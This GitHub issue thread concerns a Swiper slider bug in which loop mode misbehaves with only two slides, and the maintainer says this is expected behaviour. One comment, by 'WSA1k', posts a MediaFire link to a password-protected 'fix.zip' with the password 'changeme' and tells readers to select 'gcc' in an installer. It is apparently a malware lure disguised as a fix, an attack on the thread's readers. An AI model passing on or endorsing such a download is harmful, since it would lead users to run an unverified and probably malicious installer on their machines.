### ISSUE TITLE
Issue when combining slidesPerView auto + centeredSlides + loop with 2 slides

### ISSUE THREAD

**Issue by HassenHichri** [nolimits4web/swiper#7703]
### Check that this is really a bug

- [X] I confirm

### Reproduction link

https://jsfiddle.net/okdbfrvu/

### Bug description

Hi, when a slider has 2 slides and `slidesPerView` set to `auto`, `centeredSlides` set to `true` and `loop` set to `true`, swiping is buggy, it sometimes get stuck in the 2nd slide and it does not show the part from the next/previous slide.   

If i add a 3rd slide it works as expected, it seems the issue only happens with 2 slides

### Expected Behavior

* The slider shows parts of the next/previous slide
* When swiping switch to the next/previous slide

### Actual Behavior

https://github.com/user-attachments/assets/6bff3f19-5b33-4f74-866e-a714ef326436

### Swiper version

11.1.10

### Platform/Target and Browser Versions

any browser

### Validations

- [X] Follow our [Code of Conduct](https://github.com/nolimits4web/swiper/blob/master/CODE_OF_CONDUCT.md)
- [X] Read the [docs](https://swiperjs.com/swiper-api).
- [X] Check that there isn't already an issue that request the same feature to avoid creating a duplicate.
- [X] Make sure this is a Swiper issue and not a framework-specific issue

### Would you like to open a PR for this bug?

- [ ] I'm willing to open a PR

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nolimits4web** [comment]
Check loop mode requirements in the docs

**Comment by HassenHichri** [comment]
@nolimits4web so i understand this is an expected behaviour?

**Comment by nolimits4web** [comment]
Yes
